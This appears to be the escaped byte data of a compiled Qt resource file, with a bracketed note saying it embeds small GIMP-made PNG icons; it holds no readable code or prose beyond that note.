\\xd1\\xb3\\x4c\\xfb\\x23\\x73\\x7a\\\n\\x19\\x93\\x49\\x69\\x54\\x4b\\x17\\x03\\x49\\xb1\\x65\\x84\\x57\\xc9\\xbe\\x48\\\n\\xa0\\xae\\x33\\xb1\\x23\\x1d\\x0f\\x87\\x8c\\x53\\x53\\x05\\x9b\\x54\\xab\\x27\\\n\\x70\\xe8\\x15\\xec\\x52\\x17\\xbd\\x10\\x72\\x2c\\xef\\x13\\xd1\\x3e\\x53\\xdf\\\n\\x42\\x11\\x91\\xd0\\xd1\\x57\\xe0\\x1a\\x9e\\x5a\\xcb\\x3f\\xe2\\xef\\x04\\xf3\\\n\\xe2\\xa8\\x41\\xcc\\xb8\\x88\\xaf\\x1f\\xc9\\x41\\xbb\\xe6\\xf6\\x57\\x49\\xac\\\n\\x65\\xda\\x11\\xaa\\x99\\xb6\\x32\\x42\\x9b\\xe2\\x4a\\x92\\xeb\\xb8\\x22\\x0a\\\n\\x84\\xf6\\xd1\\x21\\x7e\\xac\\xcd\\x89\\x6e\\x1c\\x34\\x8e\\x57\\xcc\\xb3\\x21\\\n\\x86\\xb5\\x6a\\xbe\\xe4\\x8f\\xdd\\xc3\\x76\\x51\\x70\\x42\\xda\\x5c\\xf6\\xfd\\\n\\x4f\\xed\\xc1\\xeb\\x5f\\x5d\\x22\\xd5\\x16\\xb7\\xf9\\x71\\x7e\\x25\\xc9\\x7a\\\n\\xbe\\x65\\x78\\x92\\x86\\x
0c\\x39\\x6a\\x62\\x5b\\x63\\x28\\x91\\x0a\\x5c\\xf2\\\n\\xf9\\xbd\\x2c\\x7e\\x88\\x05\\xf7\\x32\\x79\\x1a\\xf1\\x64\\x7d\\x1d\\xa8\\x34\\\n\\xf9\\x5e\\x26\\xc5\\x35\\x53\\x11\\x16\\x25\\xbf\\x44\\x08\\xbe\\xdd\\x8d\\xf6\\\n\\xa5\\xbc\\x6a\\x2d\\xf3\\xb5\\x76\\x68\\x50\\x1e\\xab\\x70\\x69\\x2f\\x77\\x3e\\\n\\xc8\\x01\\x0f\\x32\\x69\\x16\\xd1\\x04\\x81\\xe8\\x3e\\x22\\x38\\x41\\xdd\\xcf\\\n\\x8d\\x8d\\x90\\x9e\\x9f\\x19\\x05\\x2a\\xb6\\x3c\\xda\\x42\\x41\\xf8\\x23\\x77\\\n\\xe6\\x4b\\xc7\\xd0\\xde\\xab\\x5c\\x9a\\x1d\\x6c\\x28\\x54\\x33\\x69\\x37\\xdb\\\n\\xd7\\x83\\xf3\\xe9\\xba\\x9d\\x33\\xdb\\x39\\x39\\x09\\xe3\\x78\\x24\\x21\\xc5\\\n\\xb4\\x98\\x63\\xf6\\x0d\\x36\\xd2\\x97\\x50\\x24\\xba\\x19\\x12\\x21\\xab\\xd9\\\n\\x9d\\x4c\\x5a\\x17\\x18\\xd2\\x7b\\x36\\x43\\xbb\\x26\\xe2\\x3f\\x0e\\x0f\\xeb\\\n\\x40\\x9f\\xc6\\x16\\x19\\xa2\\x34\\xf7\\x7b\\x3d\\x6e\\xa0\\xb7\\x9b\\xaf\\x09\\\n\\x0e\\x8f\\x23\\x1e\\x35\\xb1\\xad\\xb1\\x39\\x90\\x0a\\xb1\\x71\\x67\\xbd\\x88\\\n\\x45\\xbc\\xf2\\x45\\x3a\\x76\\x53\\x1e\\x57\\x5a\\xa5\\xde\\xab\\xda\\x57\\x44\\\n\\xd5\\x39\\x13\\x30\\x9f\\x68\\x69\\x08\\x0d\\x3a\\x44\\xc8\\x5f\\xbb\\xaa\\xa4\\\n\\x09\\xad\\x86\\xac\\xff\\x7e\\xba\\x2a\\x68\\x09\\xe6\\x47\\xb4\\x3d\\x80\\x4b\\\n\\x58\\xb3\\x9a\\xff\\x27\\xa4\\x5c\\x1c\\xae\\xec\\x45\\x9b\\x1b\\x3b\\x74\\xf0\\\n\\x9d\\xe3\\xd9\\x75\\x5b\\xfd\\x99\\xad\\x2a\\x94\\x9d\\x57\\x94\\x96\\xca\\x3c\\\n\\xde\\xd7\\xe2\\xc7\\xac\\x7b\\x20\\x84\\xf5\\x7c\\x36\\x69\\x7d\\x2d\\x48\\x29\\\n\\x22\\xc6\\xa6\\xbc\\x6b\\xdf\\x5c\\x51\\xf6\\xc6\\xfe\\xca\\x39\\xb7\\x0d\\x9e\\\n\\x24\\x7a\\x22\\x4c\\xcd\\x0b\\x0c\\x71\\x78\\x4d\\xc4\\x51\\xe3\\xf8\\xf0\\x5b\\\n\\x73\\xb1\\xb5\\x65\\xef\\xa0\\xd8\\xbe\\x67\\x71\\x1b\\x2b\\xd2\\xe0\\x83\\x30\\\n\\x12\\x98\\xe4\\x01\\x11\\x0f\\x77\\x03\\x6a\\x8c\\x5a\\x64\\x85\\xec\\xbf\\x90\\\n\\x70\\xd4\\xcd\\xdc\\xfc\\x2d\\x92\\xa5\\x82\\x3d\\x26\\x43\\x95\\xfd\\xac\\x78\\\n\\x2c\\xef\\x18\\x95\\xbf\\x96\\xf2\\x85\\x38\\x6d\\x7c\\x26\\x08\\xe2\\xdf\\x5e\\\n\\x1c\\x24\\x10\\xdb\\x03\\x8d\\x8c\\x71\\x9f\\xe0\\x29\\x9c\\xdc\\xc5\\xbb\\xaf\\\n\\x66\\xc9\\xaf\\x59\\xd2\\xcd\\x09\\x29\\x9f\\x13\\xfa\\x76\\x44\\xc7\\x1d\\x56\\\n\\x20\\x4e\\xf9\\xf0\\x02\\x0e\\x98\\x9d\\xdb\\x59\\xe5\\x48\\x93\\x3f\\x56\\xf4\\\n\\x78\\x2f\\xbb\\xb6\\xcf\\x1f\\x09\\x31\\xb4\\xff\\xc3\\x9a\\xc7\\xf8\\x4c\\xca\\\n\\x17\\x8d\\xac\\xea\\x47\\x7d\\x90\\xb2\\xfc\\x45\\x56\\xae\\xd4\\xff\\x79\\xcb\\\n\\xd4\\xed\\x84\\x87\\xdd\\x8f\\xb8\\x9d\\x83\\x23\\xf6\\x18\\xe2\\x26\\xc5\\x29\\\n\\xc7\\xcf\\xcd\\xc5\\xff\\x96\\xb5\\xa9\\xf8\\x3b\\xc6\\x93\\x24\\x3d\\x41\\x91\\\n\\xb3\\x25\\x0b\\x25\\x6c\\x56\\x8c\\x84\\x45\\xa7\\xc6\\xc8\\xc7\\x0d\\x78\\xf3\\\n\\x73\\x7c\\xe9\\x4c\\x56\\x9d\\x47\\xd2\\xad\\x7f\\xd1\\xfa\\x54\\x5f\\x55\\x12\\\n\\xfd\\x17\\x8d\\x32\\xa2\\x9b\\x9d\\x57\\x94\\x6e\\xb3\\xfb\\xb5\\xe3\\xbd\\x78\\\n\\x1d\\xb3\\x05\\x7b\\xdc\\x9f\\x1a\\x39\\x63\\x3f\\xc1\\x2f\\xf0\\x5a\\x21\\x71\\\n\\xc7\\xe5\\x46\\x27\\x91\\x05\\x31\\x0b\\x26\\x71\\xea\\xe1\\xc4\\x79\\xaf\\xb6\\\n\\xfc\\xd8\\xa0\\x5c\\x1d\\xdc\\x0c\\xc5\\x71\\xd6\\x26\\x14\\x48\\x3e\\x2d\\xd4\\\n\\x86\\x3d\\x29\\xe5\\xbb\\x1b\\xdd\\xe8\\xd6\\xc1\\x8a\\x84\\x15\\x79\\x62\\x5b\\\n\\xc5\\x90\\xe6\\xe7\\xd9\\x4c\\x4c\\x65\\x46\\xca\\x91\\x86\\x76\\x5e\\x74\\xe2\\\n\\x2d\\x0b\\x55\\x0f\\xd8\\xb2\\x76\\xc5\\x78\\x21\\x10\\xea\\xa7\\xd2\\x51\\x64\\\n\\x22\\x19\\x29\\x0b\\x4e\\x8d\\x91\\x8f\\x55\\xf8\\x6a\\xc2\\x51\\x7f\\xe0\\xfa\\\n\\xff\\x0e\\xf5\\x54\\xfb\\x49\\xb9\\x65\\x76\\x5b\\x85\\x73\\x32\\x14\\xc3\\x80\\\n\\xaa\\xec\\xbf\\xd9\\x42\\x7d\\x04\\xf1\\x71\\x4c\\x6c
\\x0b\\xc9\\x09\\xfe\\x5e\\\n\\x88\\x31\\x1c\\x09\\x48\\x84\\xcc\\x58\\x23\\xcd\\x8e\\xf8\\xb2\\xd0\\x16\\x16\\\n\\xe7\\xcf\\xbf\\x8e\\xe9\\x65\\x31\\xb5\\xd9\\x36\\x4f\\x78\\x9b\\x8d\\x99\\xaa\\\n\\x31\\xd4\\x8e\\x45\\x24\\x3f\\xe3\\x9e\\x17\\x38\\x01\\x17\\xa4\\xa3\\x83\\x81\\\n\\x59\\x1d\\xf1\\xd0\\x93\\xfa\\x2f\\xec\\x55\\x92\\x2e\\xa1\\x3f\\xe6\\x85\\xf8\\\n\\xd7\\xb7\\x35\\x7e\\x0e\\x05\\xe2\\x88\\xc3\\x3a\\x99\\x52\\x56\\x24\\x3e\\xdf\\\n\\x8e\\xa2\\xf6\\x2a\\x0b\\x69\\x13\\x9c\\xfe\\x6a\\x62\\x5b\\xa3\\xc6\\x46\\x20\\\n\\xc1\\x4d\\x29\\xc7\\xaf\\xe4\\x0b\\xe7\\xb0\\xe2\\x27\\x42\\xa6\\xfe\\xcc\\x96\\\n\\x5b\\xc5\\x81\\xe7\\x39\\xf4\\xb2\\xf3\\xca\\x50\\x5c\\xa0\\x7b\\xf1\\x4a\\x7c\\\n\\x80\\x8e\\x6d\\xf9\\x02\\xbe\\x8f\\x69\\xea\\x79\\xd0\\x12\\x48\\x78\\xcb\\xae\\\n\\x1c\\xbb\\x1f\\x71\\xe6\\x14\\x55\\x25\\xcd\\x96\\x69\\x3c\\x9a\\x21\\xbb\\x57\\\n\\x9b\\xe0\\x29\\x77\\x31\\x37\\xad\\x09\\x84\\xf6\\x86\\x51\\x42\\x68\\x33\\x3c\\\n\\xf4\\xdc\\x20\\x9e\\x27\\x3f\\xaf\\x7a\\x31\\x17\\xed\\x2c\\x88\\x98\\x37\\x84\\\n\\x6d\\x79\\xfb\\x1e\\xb4\\x37\\xe3\\x68\\xcb\\x88\\x70\\xa3\\x24\\x64\\x12\\x05\\\n\\x62\\x3b\\x62\\xd5\\xfa\\x45\\xd4\\x8b\\x4c\\x8d\\xe1\\xc0\\xb3\\xf8\\x46\\x0f\\\n\\x47\\xdf\\xc5\\x2f\\xbe\\x43\\xcf\\x4d\\xc2\\x60\\x2c\\x12\\xd5\\xe2\\xf7\\xb2\\\n\\x45\\xb6\\xa8\\x7a\\x2e\\xee\\xcf\\xa3\\x17\\xb3\\x70\\x32\\x1d\\x3b\\xf2\\xbe\\\n\\x28\\x24\\x62\\x9f\\xa7\\x9e\\x0b\\xc3\\x8a\\x76\\xa6\\x8c\\xe5\\xf3\\x6f\\x60\\\n\\x42\\xde\\x91\\x26\\x8f\\xb2\\x31\\x91\\x7d\\xaa\\x98\\xb1\\xfc\\x36\\xc2\\x65\\\n\\x24\\xd7\\x72\\x71\\x17\\xef\\xc7\\x5d\\x46\\x17\\xa1\\x95\\xf2\\x68\\xe6\\x01\\\n\\x58\\xd6\\x17\\x65\\x73\\x24\\x15\\x38\\xce\\xa9\\x4c\\x4b\\x43\\xca\\xd3\\xa1\\\n\\x98\\x0b\\x71\\xca\\x61\\x73\\x49\\xb2\\x0e\\x2e\\xfb\\xef\\xbc\\xa6\\x22\\x3b\\\n\\x9e\\x08\\x92\\x6d\\x34\\x4a\\xbc\\x90\\x33\\xd4\\x0b\\x4c\\x8d\\xe1\\x42\\x8f\\\n\\x50\\x32\\xeb\\xa4\\xd5\\x9c\\x72\\x39\\x0f\\x9e\\x4e\\xf2\\x84\\xfe\\x71\\xb9\\\n\\x79\\x95\\x57\\xd1\\x09\\xa6\\xe8\\x24\\x53\\xbc\\x2e\\x7f\\x4d\\x76\\x2c\\x15\\\n\\x72\\x39\\x7f\\x90\\x78\\x6f\\x0e\\x8d\\x39\\x1f\\xc7\\x18\\x39\\x6a\\xe5\\x51\\\n\\x87\\x1e\\xfe\\x74\\x3e\\xfb\\xef\\xaa\\x5c\\x45\\x9c\\xff\\x5d\\xf6\\x51\\xb8\\\n\\x2e\\xff\\x9b\\xc0\\x64\\x9d\\x4f\\xcf\\x2d\\xfc\\xa0\\x97\\x8f\\xa4\\x21\\xa5\\\n\\xe7\\x68\\x43\\x82\\xa7\\xba\\xf4\\x17\\x07\\x8b\\x26\\x17\\xfa\\xf6\\xdd\\x18\\\n\\xec\\x1e\\xe8\\xc1\\x9f\\xd8\\x74\\xba\\x10\\x47\\x81\\xa7\\xdd\\x73\\x4e\\x20\\\n\\xba\\xa5\\xe6\\x9f\\x0c\\x65\\x3e\\x18\\x2f\\x86\\xf3\\x9e\\x1a\\x82\\xb6\\xb4\\\n\\x0c\\x46\\xcd\\x83\\xd4\\x18\\xb1\\x58\\x85\\xd3\\x13\\xde\\xfc\\x10\\x67\\x9c\\\n\\xc1\\xea\\xab\\x05\\x43\\x4d\\xd1\\x3e\\x97\\xa1\\xcc\\x89\\xaa\\x4a\\xba\\x2d\\\n\\x22\\x7f\\xbf\\x4e\\xbc\\x13\\x6f\\x60\\xcf\\x0e\\x4e\\xc3\\xa7\\x05\\x07\\xe6\\\n\\x1a\\x5b\\x10\\x6d\\xcc\\x9e\\xc8\\xc7\\x0f\\xa1\\xa3\\x28\\xed\\x14\\x51\\x26\\\n\\xa5\\x55\\x11\\xe7\\x6c\\xdf\\x5a\\xfc\\x94\\x35\\x77\\xf2\\xb5\\x5e\\x3e\\x9b\\\n\\x86\\x34\\xa3\\xa3\\x12\\x11\\xcb\\xd7\\xd3\\xd5\\xa5\\x5a\\x1b\\x54\\xdc\\x97\\\n\\xf5\\xf7\\x9c\\xf0\\x7d\\xbe\\x50\\xc1\\x72\\x53\\x71\\xe8\\xf6\\xc4\\x93\\x9a\\\n\\xb7\\xb5\\x9f\\x99\\x20\\x15\\x38\\x86\\x86\\x73\\xdc\\x48\\x2f\\xa2\\xd1\\x07\\\n\\x35\\xb1\\xad\\xd1\\x0a\\x48\\x84\\xc2\\x01\\xa7\\xac\\xe3\\xbd\\xbf\\xe1\\xd6\\\n\\xd3\\xe9\\xb9\\x4f\\x39\\x37\\xae\\xe4\\x7b\\x7e\\x5f\\x95\\xfd\\xae\\x2c\\xf4\\\n\\x01\\x5e\\x8f\\xe3\\x98\\x3c\\x29\\x14\\xa8\\xfe\\xa6\\xc0\\x95\\xd7\\xd8\\x32\\\n\\x88\\x13\\x3e\\xbe\\x3f\\x73\\xa6\\x68\\x6e\\x2e\\xc8\\xf6\\x17\\xcf\\xa9\\x72\\
[binary payload elided: a long run of escaped, length-prefixed PNG byte streams (visible frame lengths include 0x16af and 0x10c7, each immediately followed by a PNG signature). Each recoverable stream is a 64x64, 8-bit RGBA image with bKGD/pHYs/tIME chunks (timestamped 2021-03-29) and a tEXt/iTXt comment "Created with GIMP". The 4-byte big-endian length prefix before each PNG is consistent with the qt_resource_data blob emitted by pyrcc5 for a compiled Qt resource module; the raw bytes carry no further readable content and are omitted here.]
69\\x29\\x90\\x5e\\xe8\\x48\\\n\\xf0\\xb3\\x8b\\x6e\\x10\\x2b\\x27\\x2c\\x1c\\xbe\\x07\\xbc\\xd5\\x71\\x9c\\x6f\\\n\\xd6\\xfe\\x8f\\x46\\x46\\xed\\xdc\\x6e\\x7c\\x92\\xb9\\x93\\xb0\\xc3\\xc0\\x30\\\n\\x6c\\x5c\\x08\\x4b\\xee\\xfb\\xf0\\x77\\x7a\\x7d\\xf4\\xf0\\xf0\\x0c\\x70\\x04\\\n\\xcd\\x03\\x3b\\xdf\\xd0\\x3d\\x74\\x81\\x47\\x83\\x54\\xd9\\x5d\\x5b\\x67\\x38\\\n\\x07\\x0a\\x13\\x32\\x15\\x49\\x29\\xd8\\x61\\x01\\x31\\x0d\\x89\\xbe\\x21\\x9f\\\n\\x8b\\x13\\xf4\\xc2\\x05\\x8a\\x88\\xe8\\xe6\\xef\\xdf\\x7d\\x5d\\x37\\x9a\\xdd\\\n\\x43\\x37\\xc0\\x93\\x8d\\xb5\\xc6\\xdb\\x1d\\xfb\\xc0\\x93\\x32\\xf1\\x4c\\xa9\\\n\\x4d\\x0f\\x71\\x70\\xb2\\x5f\\xf5\\xd7\\xfb\\xb9\\xb0\\xc3\\x2b\\x0e\\x33\\x4a\\\n\\xaa\\x79\\x62\\xc1\\x8d\\xdc\\x5b\\x75\\x29\\x79\\xf8\\x41\\x5b\\xb9\\x1b\\xc1\\\n\\x72\\xae\\x29\\x00\\xc3\\x60\\x4b\\xf3\\x01\\x1e\\x3d\\xf6\\xde\\x85\\xd9\\x7e\\\n\\x9e\\x31\\x61\\x7e\\x10\\x6f\\xe7\\xd1\\xed\\x1b\\x4c\\x7c\\x56\\xdf\\xc1\\xeb\\\n\\x33\\x00\\x38\\xd1\\x0f\\xcc\\x45\\x6a\\x2e\\x97\\xa0\\x24\\x44\\x15\\x97\\x14\\\n\\x4f\\x65\\xcd\\xfc\\x15\\x4c\\x92\\xf9\\x44\\x4b\\x2d\\xba\\xf2\\x43\\xfc\\xbc\\\n\\xf6\\x15\\x08\\x1b\\x83\\xdf\\xbb\\xcf\\x62\\x38\\x58\\x15\\x34\\x78\\x66\\x57\\\n\\xed\\x7b\\x5f\\x1a\\x3f\\x43\\xcc\\xf7\\x95\\xe4\\xe6\\x01\\x4f\\x1c\\xd8\\x7a\\\n\\x5b\\xa7\\x79\\xda\\x26\\x22\\x4a\\x8f\\x1c\\xaa\\x6b\\xe5\\x18\\x51\\xdb\\xd7\\\n\\x76\\x79\\x83\\x61\\x80\\x29\\x59\\x3a\\x76\\x3a\\x4f\\xd7\\x7c\\x81\\x69\\x32\\\n\\x8f\\xb0\\xd2\\xe4\\x59\\x9a\\xc5\\x25\\x13\\x9d\\x54\\x37\\xdc\\xfa\\x49\\xd0\\\n\\x9c\\x38\\xcd\\xe3\\x0d\\x5b\\x1f\\x54\\x19\\xdc\\x55\\xa6\\x53\\xda\\x56\\x5e\\\n\\x3f\\xf8\\xe1\\x13\\x04\\xa5\\xcd\\xc6\\xa4\\x43\\x61\\xfb\\x13\\x9c\\xe1\\x1c\\\n\\x96\\x86\\xb8\\x69\\x9f\\xee\\x35\\xa5\\x01\\x3d\\x09\\x96\\x8f\\x9b\\xc1\\x9a\\\n\\x05\\xd7\\x31\\x19\\x1f\\x52\\x9b\\x28\\xa9\\x69\\x16\\x26\\x2f\\xec\\x7d\\x1f\\\n\\x8c\\x1c\\x17\\x41\\x64\\x38\\x25\\xe0\\x37\\x78\\xee\\xf0\\xf6\\x87\\x76\\xc5\\\n\\x9b\\x07\\x37\\xc0\\x6b\\x2d\\xfb\\xf9\\xb8\\xa7\\xd5\\x5e\\xad\\x8c\\xa8\\x35\\\n\\xc4\\x98\\x77\\x5f\\x9b\\x9a\\xfc\\x82\\xb1\\xfc\\xc5\\xbc\\x65\\x2c\\x2a\\x9f\\\n\\x05\\x3d\\x36\\xcf\\xa7\\xdb\\xe4\\xc2\\x92\\xa9\\xac\\x99\\xfd\\x59\\x2a\\x09\\\n\\xdb\\xce\\x21\\x14\\xdd\\xc0\\x23\\xfb\\x36\\xf2\\xbb\\x86\\x6d\\x90\\xe7\\xcd\\\n\\x50\\x10\\x39\\xaf\\x5d\\xf0\\xcc\\x04\\xbe\\xda\\xf5\\x34\\x85\\x19\\xe9\\xe0\\\n\\xd5\\xfa\\x8f\\x06\\x36\\x40\\x1b\\x16\\x4f\\x1d\\xfa\\x48\\x13\\xf6\\xe7\\xee\\\n\\x76\\x22\\xcb\\x32\\x68\\x91\\x94\\x1c\\x2d\\xcd\\xfc\\xbc\\xc9\\xbc\\xbd\\xf8\\\n\\x2b\\xac\\x2d\\xbb\\x8c\\xdf\\xcc\\xba\\x99\\x7b\\x67\\x5f\\x07\\xed\\x82\\xcb\\\n\\xcb\\x66\\xf2\\x5f\\x35\\x7f\\x49\\xb9\\x51\\x80\\x5f\\x4b\\x34\\x92\\x36\\x2d\\\n\\x79\\x68\\xf7\\x7a\\x9e\\xa8\\xdf\\x02\\x21\\x69\\x83\\xa0\\x70\\x26\\xde\\xab\\\n\\x31\\x58\\x7d\\x45\\x14\\x77\\xf6\\xa9\\x46\\x10\\xce\\x18\\xb4\\x80\\x80\\x97\\\n\\xa7\\x8f\\xed\\xd6\\xfb\\x75\\x57\\x76\\x10\\xdc\\xd1\\xd9\\xc8\\xa1\\xd6\\x63\\\n\\x10\\x12\\xb6\\x1a\\x93\\xeb\\xea\\x8b\\x7e\\x4b\\xaf\\xdd\\x90\\x91\\x10\\x87\\\n\\x9a\\xfc\\x49\\x3c\\xbd\\xe4\\x26\\x26\\x19\\x61\\xfc\\x08\\x84\\x16\\xdc\\x57\\\n\\xb9\\x80\\x8b\\x3c\\x01\\xce\\x9f\\x50\\xce\\x64\\x11\\xc4\\xab\\x04\\xa6\\x50\\\n\\xb4\\x0a\\x8b\\x7f\\xda\\xbb\\x91\\xc7\\xf7\\x6e\\x82\\x90\\x33\\x1b\\xe5\\x84\\\n\\x9f\\x12\\xe0\\x71\\xaa\\x51\\xad\\xc1\\xb4\\x92\\x0a\\x93\\xd4\\x99\\x51\\x3a\\\n\\x45\\x65\\xaa\\xef\\x6e\\x65\\xf7\\xa9\\x26\\xa6\\x16\\x55\\xa5\\x7b\\x40\\x02\\\n\\x78\\xe1\\xc8\\xde\\x9b\\x90\\x16\\x58\\x09\\x3b\\xfe\\xcf\\xa4\\x2a\\xd3\\x1a
\\\n\\xba\\xe2\\x2c\\x0c\\x4f\\xe2\\xd9\\x25\\x5f\\xa4\\xca\\x08\\x13\\x44\\x22\\x11\\\n\\x08\\xa0\\x58\\x7b\\x59\\x71\\xde\\x1c\\xaa\\x3d\\xf9\\x78\\x35\\x98\\x42\\xd3\\\n\\x2a\\x34\\xff\\x78\\xb0\\x96\\x9f\\xec\\xd9\\x00\\x21\\x67\\x52\\xda\\x01\\x4f\\\n\\xb4\\x3d\\xa6\\xd3\\x31\\xe6\\xf9\\x4a\\xb9\\x38\\x5c\\x81\\x8c\\x3b\\x9e\\xea\\\n\\x1a\\x24\\x63\\x55\\xab\\x9d\\x50\\xd1\\x60\\x58\\xfc\\x5f\\x53\\xdd\\x0d\\x19\\\n\\x3d\\xe0\\xa8\\x8a\\xf2\\xce\\xa9\\x43\\xcf\\xe3\\x71\\xcc\\xa2\\xcf\\x04\\xfd\\\n\\x35\\xc4\\x35\\x0b\\x46\\x4f\\x66\\xed\\x45\\x37\\x31\\xde\\x08\\xa0\\x94\\x04\\\n\\x29\\x30\\x5c\\xfa\\x24\\x04\\xc2\\x31\\x88\\x89\\xe0\\x94\\x32\\x79\\xa4\\x6e\\\n\\x23\\x8f\\xee\\xfa\\x3d\\xe4\\xc9\\xf4\\x7b\\x1b\\x06\\x44\\x14\\xf7\\x5c\\x78\\\n\\x2d\\xdf\\x3c\\x6f\\x3e\\x52\\x48\\x5e\\x69\\xab\\x67\\xd5\\xd6\\x17\\xc1\\x50\\\n\\x29\\xd2\\x5b\\x3f\\x27\\x10\\x29\\x98\\xe1\\xf3\\xb2\\xb1\\xf1\\xc0\\xaf\\x9b\\\n\\x67\\x6a\\x51\\xe2\\xfc\\xa8\\x77\\x99\\xdb\\xe3\\x11\\x76\\x74\\x9d\\x4c\\x71\\\n\\x25\\x3d\\xf4\\x3c\\xef\\xae\\x82\\x12\\x14\\xf9\\x0a\\xf9\\x45\\xcd\\xf5\\x94\\\n\\x7b\\xf3\\xf0\\x68\\x03\\x53\\x4a\\x37\\x6a\\x11\\xc2\\x06\\x76\\xe9\\x94\\xef\\\n\\x0a\\xd8\\x7d\\xba\\x89\\xb5\\xdb\\x37\\xd9\\x80\\x27\\x94\\xbd\\xea\\x96\\x72\\\n\\xc2\\xc9\\x80\\x6e\\x8b\\xbb\\x66\\x5c\\xc6\\x77\\x2a\\x16\\x51\\x6e\\x84\\x98\\\n\\x24\\x03\\x5c\\x5e\\x58\\x41\\x49\\x41\\x49\\x32\\xb5\\x8a\\x01\\xaa\\x55\\xa1\\\n\\x41\\x2b\\xf6\\x46\\xda\\x38\\x4c\\x47\\x7a\\x08\\x1c\\x8d\\xb7\\x42\\x22\\xd2\\\n\\x57\\xc0\\xd3\\xb2\\xef\\x99\\x0b\\x7b\\xd6\\x02\\x62\\x06\\xdf\\xb9\\xe0\\x0a\\\n\\x66\\xfa\\x4b\\xf0\\x0a\\x81\\x10\\x02\\x0f\\xe0\\x4d\\x03\\x0d\\x1b\\x30\\x0d\\\n\\x60\\xfe\\x98\\x52\\xbe\\xbd\\xe0\\x6a\\x88\\x4a\\x10\\x86\\x2d\\x8f\\xbb\\xc2\\\n\\x68\\xb7\\x87\\xd5\\x33\\xaf\\xe3\\xbb\\x53\\x96\\x51\\xa0\\x7d\\x60\\x6a\\x34\\\n\\xd0\\x61\\x76\\xd3\\xd6\\x71\\xda\\xf1\\xd6\\x6c\\x2a\\x94\\x23\\xd8\\x68\\x0f\\\n\\x48\\x03\\x53\\x44\\xd8\\xd1\\xd6\\x98\\x6e\\x80\\x8f\\x3b\\x9c\\xd4\\x37\\x54\\\n\\xb7\\x4f\\x13\\x35\\x35\\x33\\xf2\\x8b\\xb9\\x76\\xdc\\x34\\x3c\\xda\\x75\\x72\\\n\\xbb\\x2e\\x13\\xa9\\x5c\\x59\\x24\\x4b\\x6b\\x03\\x4d\\xc8\\x52\\xdc\\x56\\x79\\\n\\x21\\x3f\\x9a\\x73\\x35\\x22\\xe2\\x05\\xaf\\x07\\x3c\\x12\\xa2\\x06\\xdf\\x9a\\\n\\xbd\\x9c\\x55\\x95\\x35\\x14\\x69\\x69\\xd7\\x77\\x86\\xa0\\x9e\\x6e\\xee\\xdc\\\n\\xbe\\x0e\\x53\\x45\\x1c\\xd5\\xd8\\x15\\x67\\x54\\x86\\x01\\x3a\\x8b\\xa7\\x34\\\n\\x78\\xe0\\xfd\\x96\\xa6\\x1b\\xd2\\x0d\\x70\\xfa\\xd4\\xb8\\x61\\xd5\\xba\\xa9\\\n\\x11\\x63\\xd8\\x83\\x58\\x56\\x71\\x01\\x65\\x9e\\x80\\xed\\xea\\xc9\\xa2\\x74\\\n\\xd0\\x63\\xb4\\x16\\xdc\\x36\\x79\\x31\\xab\\x67\\x2c\\x83\\x88\\x33\\xf9\\x0b\\\n\\x2e\\xe7\\xfe\\xca\\xcf\\x50\\xa8\\x40\\xa0\\xb1\\x84\\xa2\\x4e\\x74\\xf0\\xf5\\\n\\xad\\x2f\\xf1\\x7e\\xcb\\x01\\x08\\x7a\\x9c\\x21\\x3b\\x24\\x23\\x1b\\x31\\xd3\\\n\\x49\\x5b\\xb4\\xc4\\x7a\\x3e\\x97\\x0e\\x82\\xb1\\xc8\\x4a\\xdb\\x92\\xfd\\x9a\\\n\\x17\\xb9\\x1a\\x40\\x00\\x4a\\x23\\x4c\\xc9\\xf5\\xe7\\x55\\x13\\x4c\\xb1\\xae\\\n\\x1c\\x90\\xc2\\xda\\xff\\x49\\xc3\\x36\\xd3\\x28\\x34\\x77\\x55\\xd6\\x30\\x06\\\n\\x89\\x90\\x92\\x2f\\x56\\x2c\\xa4\\x58\\xeb\\x5e\\x8c\\xdb\\x61\\xb6\\xb2\\xea\\\n\\xfd\\xdf\\xb2\\xa9\\xed\\x10\\xf8\\x00\\xd3\\xec\\x8f\\x7a\\x59\\xf0\\xc9\\x25\\\n\\x48\\x82\\x8e\\x68\\x47\\x4d\\x33\\x26\\x25\\x78\\x6c\\x03\\x24\\x80\\x23\\xb1\\\n\\xc8\\x3d\\xf6\\x0a\\x0e\\x81\\xf4\\xf4\\xc7\\x4a\\xa5\\x99\\xe6\\xcb\\xa7\\xca\\\n\\x53\\x8c\\x42\\x63\\xf4\\xd7\\x0b\\x45\\x76\\xe3\\xf5\\xf6\\x48\\x94\\x66\\x94\\\n\\x90\\xdc\\x56\\x75\\x
31\\x4a\\x2b\\x02\\xae\\xeb\\x4a\\xc1\\x11\\xd1\\xc5\\xca\\\n\\xad\\xaf\\xb0\\xe5\\xd4\\x01\\x08\\x4a\\x87\\x54\\x09\\xfb\\x7b\\x44\\xb2\\xfb\\\n\\x94\\x6d\\xf5\\xb4\\x7d\\x9d\\x88\\x19\\xaf\\x32\\x95\\x02\\xe9\\x78\\x40\\x14\\\n\\x88\\xa1\\x02\\x99\\x3b\\x17\\x83\\x61\\x40\\x4a\\xa7\\x27\\x61\\x31\\xba\\xb0\\\n\\x88\\x02\\x02\\x08\\x77\\x66\\x03\\x19\\x53\\xa4\\xbe\\xb4\\xfd\\x44\\x48\\x1b\\\n\\x2c\\x3d\\x1a\\xb4\\x83\\x1f\\x96\\x84\\x7d\\x89\\x2e\\xae\\xdb\\xf2\\x9f\\x34\\\n\\x74\\x1d\\x05\\xbf\\xc7\\xb9\\xa7\\x4a\\x71\\x31\\x9d\\xbd\\xb9\\xa2\\xfb\\x96\\\n\\x04\\x32\\x66\\x46\\x3d\\xce\\x98\\x65\\x6e\\xe5\\xed\\x40\\x13\\xd0\\x0e\\xb1\\\n\\xb1\\x47\\x5f\\xec\\x0b\\x22\\x50\\xe9\\xab\\x9f\\x73\\x29\\xed\\x84\\xaa\\x48\\\n\\x0e\\xae\\x59\\x28\\xee\\xdf\\xfc\\x5b\\x1a\\x3a\\x8f\\x83\\x5f\\xa7\\x08\\xc3\\\n\\x62\\x70\\x32\\x44\\x7f\\x9d\\x52\\x38\\xb1\\x9f\\x52\\x07\\xf8\\xdc\\x0f\\x86\\\n\\x5d\\xfc\\x88\\xde\\x51\\xc7\\x51\\x80\\x1c\\x31\\x5d\\x58\\x00\\x3e\\x24\\x35\\\n\\x13\\x27\\x43\\xc2\\xa9\\x33\\x5c\\x86\\x3a\\xe4\\x8c\\x65\\xff\\x8d\\x14\\x22\\\n\\xea\\xfe\\xad\\x04\\xf0\\x03\\xe3\\x03\\xc1\\x67\\x51\\xc3\\x4c\\x83\\x6e\\xf6